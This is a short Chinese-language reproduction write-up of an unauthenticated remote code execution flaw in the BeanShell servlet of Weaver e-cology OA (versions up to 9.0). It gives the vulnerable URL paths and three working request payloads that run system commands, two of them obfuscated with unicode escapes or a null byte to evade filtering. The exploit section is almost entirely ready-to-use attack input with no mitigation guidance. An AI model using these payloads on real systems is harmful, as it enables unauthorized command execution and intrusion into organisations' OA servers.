0x00 漏洞原理

该漏洞位于 e-cology OA系统BeanShell组件中,并且该组件允许未授权访问,攻击者可通过访问该组件执行任意的Java代码,导致远程命令执行。

0x01影响版本

泛微 e-cology<=9.0

0x02复现

可能的路径

/weaver/bsh.servlet.BshServlet
/weaveroa/bsh.servlet.BshServlet
/oa/bsh.servlet.BshServlet

payload:

bsh.script=exec("whoami");&bsh.servlet.output=raw
bsh.script=\u0065\u0078\u0065\u0063("whoami");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw
bsh.script=eval%00("ex"%2b"ec(bsh.httpServletRequest.getParameter(\\"command\\"))");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw&command=whoami

泛微e-cology OA 远程代码执行漏洞

泛微e-cology OA 远程代码执行漏洞

0x03参考

https://github.com/myzing00/Vulnerability-analysis/tree/master/0917/weaver-oa/CNVD-2019-32204

相关文章:

  • 2022-12-23
  • 2022-12-23
  • 2022-02-16
  • 2021-08-16
  • 2021-11-10
  • 2021-05-12
  • 2021-05-14
  • 2021-10-26
猜你喜欢
  • 2022-01-14
  • 2021-10-21
  • 2021-12-11
  • 2021-11-02
  • 2021-04-07
  • 2022-12-23
  • 2021-10-28
相关资源
相似解决方案